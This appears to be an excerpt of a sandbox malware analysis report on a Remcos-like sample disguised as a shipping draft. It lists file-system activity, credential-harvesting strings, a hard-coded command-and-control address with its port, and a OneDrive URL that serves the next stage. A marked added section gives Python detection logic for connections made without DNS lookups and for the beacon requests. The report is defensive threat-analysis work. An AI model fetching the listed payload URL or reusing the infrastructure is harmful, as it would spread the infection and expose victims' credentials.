Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 34_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose, 34_2_00007FF70CC97B4C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0040AE51 FindFirstFileW,FindNextFileW, 36_2_0040AE51
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 37_2_00407EF8
Source: C:\Users\Public\Libraries\glrkszlG.pif File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.tmp
Source: C:\Users\Public\Libraries\glrkszlG.pif File opened: C:\Users\user\AppData\Local\
Source: C:\Users\Public\Libraries\glrkszlG.pif File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp
Source: C:\Users\Public\Libraries\glrkszlG.pif File opened: C:\Users\user\AppData\
Source: C:\Users\Public\Libraries\glrkszlG.pif File opened: C:\Users\user\
Source: C:\Users\Public\Libraries\glrkszlG.pif File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp

Networking

Source: Malware configuration extractor URLs: https://onedrive.live.com/download?resid=7E01B4B465D32A9A%213365&authkey=!AAwtw4clrUPD3Bw
Source: Malware configuration extractor URLs: 104.250.180.178
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028BD028 InternetCheckConnectionA, 0_2_028BD028
Source: global traffic TCP traffic: 192.168.2.4:49733 -> 104.250.180.178:7902
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 13.107.139.11
Source: Joe Sandbox View IP Address: 104.250.180.178
Source: Joe Sandbox View IP Address: 178.237.33.50
Source: Joe Sandbox View ASN Name: M247GB
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic HTTP traffic detected: GET /download?resid=7E01B4B465D32A9A%213365&authkey=!AAwtw4clrUPD3Bw HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
Source: unknown TCP traffic detected without corresponding DNS query: 104.250.180.178 (this line is repeated 50 times in the report: the C2 address is hard-coded in the extracted configuration, so no DNS lookup precedes the connections to 104.250.180.178:7902)
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2795B380 InternetOpenW,InternetOpenUrlW,InternetReadFile, 0_2_2795B380
Source: global traffic HTTP traffic detected: GET /download?resid=7E01B4B465D32A9A%213365&authkey=!AAwtw4clrUPD3Bw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
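The following is an added example, not part of the sandbox report. It implements the detection logic behind two of the signatures above: the correlation of outbound TCP connects with earlier DNS answers that produces "TCP traffic detected without corresponding DNS query", and a classifier for the two HTTP requests captured here (the Remcos geoplugin.net check-in and the WinHttp.WinHttpRequest.5 download from onedrive.live.com). The DNS and connection records in the block are constructed sample input modelled on the traffic in the report; the name-to-address mappings (13.107.139.11 for the OneDrive edge, 178.237.33.50 for geoplugin.net) and the 192.168.2.1:445 local connect are assumptions.

```python
"""Detection logic behind two of the network signatures listed above.

1. "TCP traffic detected without corresponding DNS query": every outbound
   connect is checked against the DNS answers seen earlier in the capture.
   A public destination that no DNS answer ever produced is a hard-coded
   address; here that is the Remcos C2 104.250.180.178:7902 taken from the
   extracted configuration.
2. The geoplugin.net /json.gp check-in request, and the download of the next
   stage through the WinHttp.WinHttpRequest.5 COM object.

DNS_LOG and TCP_LOG are CONSTRUCTED sample input modelled on the traffic in
the report; the name-to-address mappings are assumptions.
"""
from __future__ import annotations

import ipaddress
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class DnsAnswer:
    ts: float    # seconds since the start of the capture
    name: str
    addr: str


@dataclass(frozen=True)
class TcpConnect:
    ts: float
    src: str
    dst: str
    dport: int


# Constructed sample input. Assumed mappings: 13.107.139.11 stands in for the
# OneDrive edge, 178.237.33.50 for geoplugin.net.
DNS_LOG = [
    DnsAnswer(1.0, "onedrive.live.com", "13.107.139.11"),
    DnsAnswer(1.3, "c6c4bq.db.files.1drv.com", "13.107.139.11"),
    DnsAnswer(6.0, "geoplugin.net", "178.237.33.50"),
]

TCP_LOG = [
    TcpConnect(1.1, "192.168.2.4", "13.107.139.11", 443),   # resolved just before
    TcpConnect(6.2, "192.168.2.4", "178.237.33.50", 80),    # resolved just before
    TcpConnect(4.0, "192.168.2.4", "192.168.2.1", 445),     # local share, no DNS expected (assumed)
] + [
    # 50 raw connects to the configured C2, as in the report above
    TcpConnect(8.0 + 10.0 * i, "192.168.2.4", "104.250.180.178", 7902) for i in range(50)
]


def connections_without_dns(dns_log, tcp_log, window=300.0):
    """Return the connects whose destination address was not returned by any
    DNS answer in the `window` seconds before the connect.

    Private, loopback and link-local destinations are skipped because hosts
    reach those without DNS in normal operation (the ping 127.0.0.1 delay in
    this report is an example)."""
    answers = defaultdict(list)  # address -> timestamps at which DNS returned it
    for a in dns_log:
        answers[a.addr].append(a.ts)
    flagged = []
    for c in sorted(tcp_log, key=lambda x: x.ts):
        ip = ipaddress.ip_address(c.dst)
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            continue
        if any(c.ts - window <= t <= c.ts for t in answers.get(c.dst, ())):
            continue
        flagged.append(c)
    return flagged


def summarize(flagged):
    """Collapse repeated hits to (dst, dport, count); the 50 identical lines
    in the report above become one entry here."""
    counts = Counter((c.dst, c.dport) for c in flagged)
    return sorted(((d, p, n) for (d, p), n in counts.items()), key=lambda t: -t[2])


WINHTTP_COM_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"


def classify_http(method, host, path, headers):
    """Label an HTTP request with the traffic pattern it matches, or None.

    'remcos-geoip': the GET /json.gp to geoplugin.net that Remcos issues on
    check-in (the captured request carries Cache-Control: no-cache and no
    User-Agent header, which a browser would never omit).
    'winhttprequest-download': a fetch with the default User-Agent of the
    WinHttp.WinHttpRequest.5 COM object, used by the loader stage here to
    pull the next stage from onedrive.live.com."""
    h = {k.lower(): v for k, v in headers.items()}
    if method == "GET" and host.lower() == "geoplugin.net" and path.split("?")[0] == "/json.gp":
        return "remcos-geoip"
    if h.get("user-agent") == WINHTTP_COM_UA:
        return "winhttprequest-download"
    return None


if __name__ == "__main__":
    hits = connections_without_dns(DNS_LOG, TCP_LOG)
    for dst, port, n in summarize(hits):
        print(f"TCP traffic without corresponding DNS query: {dst}:{port} ({n} connects)")
```

Run against the constructed log, only the 50 connects to 104.250.180.178:7902 are flagged; the OneDrive and geoplugin.net connects are preceded by a matching DNS answer and the local 192.168.2.1 connect is skipped as private. In a real capture the same logic runs over Zeek dns.log/conn.log or equivalent, and the window should be set to the DNS TTLs you expect rather than the 300 seconds assumed here.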
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bhv5415.tmp.36.dr String found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhv5415.tmp.36.dr String found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000003.1864575924.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000003.1864575924.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: onedrive.live.com
Source: global traffic DNS traffic detected: DNS query: c6c4bq.db.files.1drv.com
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: bhv5415.tmp.36.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv5415.tmp.36.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv5415.tmp.36.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: bhv5415.tmp.36.dr String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: bhv5415.tmp.36.dr String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000986000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1868530475.000000002756F000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1791549862.000000002754C000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1936062124.000000002756F000.00000004.00000020.00020000.00000000.sdmp, bhv5415.tmp.36.dr String found in binary or memory: http://geoplugin.net/json.gp
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1868530475.000000002756F000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1791549862.000000002754C000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1936062124.000000002756F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp&c2?
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114575191.00000000279AB000.00000040.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000986000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpV
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000986000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp_
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000986000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpj
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: bhv5415.tmp.36.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv5415.tmp.36.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv5415.tmp.36.dr String found in binary or memory: http://ocsp.digicert.com0Q
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: bhv5415.tmp.36.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: bhv5415.tmp.36.dr String found in binary or memory: http://ocspx.digicert.com0E
